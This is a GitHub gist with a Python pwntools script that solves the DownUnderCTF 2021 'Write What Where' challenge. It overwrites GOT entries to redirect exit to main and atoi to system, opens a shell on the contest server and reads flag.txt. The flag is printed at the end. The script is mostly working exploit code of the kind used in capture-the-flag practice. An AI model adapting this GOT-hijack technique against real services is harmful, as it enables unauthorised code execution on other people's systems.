Skip to content

Instantly share code, notes, and snippets.

@ikerl
Created Sep 26, 2021
Embed
What would you like to do?
DownUnderCTF 2021 - Write What Where
#!/bin/python3
from pwn import *
while True:
try:
io = remote("pwn-2021.duc.tf", 31920)
libc = ELF("libc.so.6")
# exit -> ret2main
what = "\xa9\x11\x40\x00" # Main
where = int.from_bytes(p64(0x00404038),"little") # exit -> 0x00404038
io.readline()
io.readline()
io.send(what)
io.readline()
io.send(str(where))
log.info("exit got -> ret2main")
# atoi -> system
what = "\x00\x60\xfa\x00" # The last 2 bytes of the system's address in the libc
where = int.from_bytes(p64(0x00404030-1),"little") # atoi -> 0x00404030
io.readline()
io.readline()
io.send(what)
io.readline()
io.send(str(where))
log.info("atoi got -> system")
# Command execution
what = "pwnd!"
where = "/bin/sh" + "\x00\x00"
io.readline()
io.readline()
io.send(what)
io.readline()
io.send(where)
io.sendline("ls")
print(io.recv())
io.sendline("cat flag.txt")
io.interactive()
except EOFError:
io.close()
# DUCTF{arb1tr4ry_wr1t3_1s_str0ng_www}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment